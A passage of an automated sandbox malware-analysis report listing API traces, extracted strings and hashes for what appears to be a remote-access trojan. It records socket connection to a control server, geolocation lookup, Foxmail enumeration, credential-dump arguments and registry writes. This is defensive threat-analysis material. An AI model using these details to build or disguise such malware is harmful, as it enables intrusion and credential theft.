                                                • API String ID: 2830904901-864355567
                                                • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$ErrorLastLocalTime
                                                • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-GT4655$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                • API String ID: 524882891-3748703744
                                                • Opcode ID: 0bbf41032f1e9047e98c730053b1f0e3a98963d92bbc80a59a2a1b358eeaa471
                                                • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                • Opcode Fuzzy Hash: 0bbf41032f1e9047e98c730053b1f0e3a98963d92bbc80a59a2a1b358eeaa471
                                                • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,68491986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                • String ID: /stext "$0TG$0TG$NG$NG
                                                • API String ID: 1223786279-2576077980
                                                • Opcode ID: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                                • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                • Opcode Fuzzy Hash: d9a727a6c5d83e61f18b2f9f44eefed23ab4c1bdf9ccf4ff8e45248a4edcb3dc
                                                • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                                                Control-flow Graph

                                                APIs
                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                • String ID: )$Foxmail$ProgramFiles
                                                • API String ID: 672098462-2938083778
                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                Control-flow Graph

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                • API String ID: 2490988753-744132762
                                                • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                Control-flow Graph

                                                APIs
                                                • connect.WS2_32(FFFFFFFF,00DA4958,00000010), ref: 004048E0
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                • API String ID: 994465650-2151626615
                                                • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                                                • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                Control-flow Graph

                                                APIs
                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LongNamePath
                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                • API String ID: 82841172-425784914
                                                • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                Control-flow Graph: basic blocks from 0044ACC9 (node and edge listing and executed/not-executed legend omitted)
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                • __freea.LIBCMT ref: 0044AEB0
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • __freea.LIBCMT ref: 0044AEB9
                                                • __freea.LIBCMT ref: 0044AEDE
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 3864826663-0
                                                • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A

                                                Control-flow Graph: basic blocks from 0041B411 (node and edge listing and executed/not-executed legend omitted)
                                                APIs
                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                Strings
                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                • String ID: http://geoplugin.net/json.gp
                                                • API String ID: 3121278467-91888290
                                                • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA

                                                Control-flow Graph: basic blocks from 0041B354 (node and edge listing and executed/not-executed legend omitted)
                                                APIs
                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 782494840-2070987746
                                                • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                Control-flow Graph: basic blocks from 10008821 (node and edge listing and executed/not-executed legend omitted)
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                • __freea.LIBCMT ref: 10008A08
                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                • __freea.LIBCMT ref: 10008A11
                                                • __freea.LIBCMT ref: 10008A36
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountEventTick
                                                • String ID: !D@$NG
                                                • API String ID: 180926312-2721294649
                                                • Opcode ID: e277d64d27a4794d0741d7eac2fe64040eebd26b458680d9c5a88a7279e07c1c
                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                • Opcode Fuzzy Hash: e277d64d27a4794d0741d7eac2fe64040eebd26b458680d9c5a88a7279e07c1c
                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                APIs
                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create$EventLocalThreadTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 2532271599-1507639952
                                                • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: pth_unenc
                                                • API String ID: 1818849710-4028850238
                                                • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 3360349984-0
                                                • Opcode ID: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                • Opcode Fuzzy Hash: e2c7dcd9189a3044f1cf6e3ebfe82ec704a9a5fd688f20b61e04b54ec391fab7
                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                APIs
                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModuleProtectVirtual
                                                • String ID:
                                                • API String ID: 2905821283-0
                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
